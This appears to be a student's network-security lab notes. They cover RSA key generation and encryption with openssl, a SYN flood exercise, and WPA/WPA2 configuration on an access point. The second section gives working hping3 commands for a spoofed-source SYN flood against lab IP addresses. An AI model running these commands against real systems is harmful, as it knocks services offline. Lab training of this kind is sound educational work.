

1.Demonstrate the process of generating a public key and private key pair in RSA encryption.

openssl :- cryptography software library makes communication over computer networks more secure
.pem(Privacy-enhanced Electronic Mail) : for store the ssl certificates
2048
pkeyutl : public key algorithm utility perform low level public key operation
-pubin : input file is public key

ANS:
openssl version  
openssl list -cipher-commands 

mkdir user1 and User2 
cd user1 and user2 

on user1:
openssl genrsa -out Privatekeyusr1.pem 2048
cat Privatekeyusr1.pem 

on user2:
openssl genrsa -out Privatekeyusr2.pem  2048
cat Privatekeyusr1.pem 

on user1:
openssl rsa -in Privatekeyusr1.pem -pubout -out Publickeyusr1.pem

on user2:
openssl rsa -in Privatekeyusr2.pem -pubout -out Publickeyusr2.pem

on user1:
cat >msg (to save the msg cnt D)

openssl pkeyutl -encrypt -in file1 -out cipher -inkey /home/kali/Desktop/user2/Publickeyusr2.pem -pubin

on user2:
cp /home/kali/Desktop/user1/cipher  recive

openssl pkeyutl  -decrypt -in recive -out msg -inkey Privatekeyusr2.pem



2.Perform SYN flood attack, and exploit the TCP handshake process? 

hping3 : TCP penetration testing tool

ANS:
hping3 -S  200.200.200.2 -a 200.200.200.1 -p 80 -d 110 --flood

Explanation of the options used:

-c <number_of_packets>: Specifies the number of packets to send.
-i <interval>: Specifies the interval between packets.
-S: Sets the SYN flag in the TCP header, indicating the start of a TCP connection.
-p <target_port>: Specifies the target port number on the victim machine.
<target_IP>: Specifies the IP address of the target machine.
For example, to send 100 SYN packets to port 80 of IP address 200.200.200.1 with an interval of 0.2 seconds between packets

ANS2:
hping3 -c 100 -i 0.2 -S -p 80 200.200.200.1

3. Configure Wireless Security Settings on a WAP

Configure WPA/WPA2 Personal
Step 1. Log in to the web-based utility of your access point and choose Wireless > Networks.
Step 2. Under the Virtual Access Points (SSIDs) area, check the check box of the SSID you want to configure and click Edit.
Step 3. Click WPA Personal from the Security drop-down list.
Step 4. Choose the WPA version (WPA-TKIP or WPA2-AES) by checking the check box. Two may be chosen at once.
	- WPA-TKIP — Wi-Fi Protected Access-Temporal Key Integrity Tool. The network has some client stations that only support the original WPA and TKIP security protocol. Note that 	choosing only WPA-TKIP for access point is not allowed as per the latest Wi-Fi Alliance requirement.
	- WPA2-AES — Wi-Fi Protected Access-Advanced Encryption Standard. All client stations on the network support WPA2 and AES-CCMP cipher/security protocol. This WPA version provides 	the best security per IEEE 802.11i standard. As per the latest Wi-Fi Alliance requirement, the WAP has to support this mode all the time.
Step 5. Create a password consisting of 8-63 characters and enter it in the Key field
Step 6. (Optional) In the Broadcast Key Refresh Rate field, enter a value or the interval at which the broadcast (group) key is refreshed for clients associated with this VAP. The default is 300 seconds and the valid range is from 0 to 86400 seconds. A value of 0 indicates that the broadcast key is not refreshed.
Step 7. Click Save.

4.You now have configured WPA Personal on your WAP.

Configure WPA/WPA2 Enterprise
Step 1. Log in to the web-based utility of your access point and choose Wireless > Networks.
Step 2. Under the Virtual Access Points (SSIDs) area, check the SSID you want to configure and click the Edit button below it.
Step 3. Choose WPA Enterprise from the Security drop-down list.
Step 4. Choose the WPA version (WPA-TKIP, WPA2-AES, and Enable pre-authentication).
	•Enable pre-authentication— If you choose WPA2-AES only or both WPA-TKIP and WPA2-AES as the WPA version, you can enable pre-authentication for the WPA2-AES clients. Check this 	option if you want the WPA2 wireless clients to send the pre-authentication packets. The pre-authentication information is relayed from the WAP device that the client is currently 	using to the target WAP device. Enabling this feature can help speed up the authentication for roaming clients who connect to multiple Access Points (AP).
Step 5. (Optional) Uncheck the Use global RADIUS server settings check box to edit the settings.
Step 6. (Optional) Click the radio button for the correct Server IP Address Type. example IPv4
Step 7. Enter the IP address of the RADIUS server in the Server IP Address field. example 192.168.1.100
Step 8. In the Key field, enter the password key corresponding to your RADIUS server that the WAP uses to authenticate to the RADIUS server. You can use from 1 to 64 standard alphanumeric and special characters.
Step 9. (Optional) Repeat Steps 7-8 for every RADIUS server in your network that you want the WAP to communicate with.
Step 10. (Optional) Check the EnableRADIUS Accounting check box to enable tracking and measuring of the resources a user has consumed (system time, the amount of data transmitted). Enabling this feature will allow RADIUS accounting for both the primary and backup servers.
Step 11. Click Save..
You now have successfully configured WPA/WPA2 Enterprise security on your WAP.





